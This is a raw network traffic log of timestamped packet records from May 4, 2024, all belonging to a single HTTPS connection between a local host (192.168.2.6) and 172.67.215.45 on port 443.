May 4, 2024 09:48:39.681243896 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681277037 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681282997 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681296110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681313038 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681317091 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681359053 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681372881 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681375980 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681382895 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.681423903 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.681497097 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.699610949 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.699630022 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.699914932 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.699924946 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.699987888 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.700999975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701016903 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701096058 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701102972 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701153994 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701334953 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701358080 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701414108 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701421976 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701431990 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701451063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701459885 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701467037 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701499939 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701508045 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701515913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701527119 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701533079 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701562881 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701576948 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701586008 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701601982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701613903 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701643944 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701654911 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701662064 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701670885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701692104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701714993 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701721907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701728106 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701761007 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701762915 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701790094 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701792002 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701802015 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701813936 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701823950 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701858997 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701869965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701879025 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701890945 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701896906 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701921940 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701927900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701946020 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.701956034 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.701970100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702002048 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702008009 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702020884 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702033043 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702033043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702102900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702106953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702120066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702131987 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702133894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702157974 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702166080 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702187061 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702193022 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702209949 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702243090 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702250004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702260017 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702274084 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702276945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702310085 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702316999 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702326059 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702344894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702344894 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702377081 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702382088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702392101 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702406883 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702414036 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702447891 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702472925 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702478886 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702488899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702512026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702529907 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702543974 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702553034 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702559948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702575922 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702590942 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702606916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702610970 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702622890 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702639103 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702667952 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702667952 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702691078 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702703953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702711105 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702723980 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702754021 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702758074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702770948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702788115 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702814102 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702820063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702836037 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702837944 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702856064 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702857971 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702871084 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702891111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702914000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702923059 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702930927 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702955961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702960014 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702980042 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.702984095 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.702997923 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703010082 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703051090 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703058004 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703063965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703079939 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703090906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703140974 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703147888 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703157902 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703193903 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703214884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703221083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703232050 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703248024 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703280926 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703284979 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703293085 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703306913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703329086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703335047 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703351974 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703361034 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703373909 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703377008 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703385115 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703406096 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703440905 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703475952 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703491926 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703517914 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703522921 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703536034 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703536987 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703557968 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703560114 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703572035 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703589916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703623056 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703624964 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703634977 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703650951 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703684092 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703696012 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703705072 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703737020 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703766108 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703773975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703788996 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703835011 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703841925 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703847885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703860044 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703886986 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703892946 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703908920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703918934 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703927994 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703954935 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703967094 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703977108 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.703989029 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.703999043 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704022884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704029083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704046965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704054117 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704066038 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704117060 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704121113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704121113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704128027 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704144955 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704178095 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704185963 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704199076 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704200029 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704217911 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704248905 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704256058 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704277039 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704279900 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704298973 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704325914 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704332113 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704344034 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704351902 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704360962 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704379082 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704385996 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704406977 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704426050 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704427004 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704435110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704442024 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704476118 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704483986 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704498053 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704502106 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704509974 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704530001 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704555035 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704562902 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704567909 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704592943 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704602957 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704611063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704621077 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704634905 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704641104 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704657078 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704663038 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704674006 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704682112 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704700947 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704708099 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704714060 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704727888 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704749107 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704752922 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704760075 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704778910 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704788923 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704794884 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704807997 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704821110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704826117 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704834938 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704839945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704859972 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704876900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704880953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704886913 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704894066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704910040 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704921007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704927921 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704931974 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704957962 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704957962 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704978943 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.704982042 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.704989910 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705008984 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705037117 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705040932 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705049992 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705061913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705068111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705075026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705096960 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705104113 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705112934 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705131054 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705135107 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705142975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705163956 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705188990 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705197096 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705204010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705226898 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705229044 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705243111 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705246925 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705255985 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705272913 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705282927 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705290079 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705310106 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705317020 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705341101 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705365896 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705391884 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705420971 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705429077 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705440998 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705446005 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705461025 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705476999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705529928 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705535889 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705564976 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705579996 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705589056 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705602884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705621958 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705627918 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705641985 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705647945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705658913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705681086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705682039 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705707073 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705724955 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705739975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705760956 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705760956 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705785990 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705795050 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705813885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705830097 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705832005 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705842018 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705853939 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705881119 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705888033 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705903053 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705914974 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705950022 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.705954075 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705964088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.705981016 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.706003904 CEST	49707	443	192.168.2.6	172.67.215.45
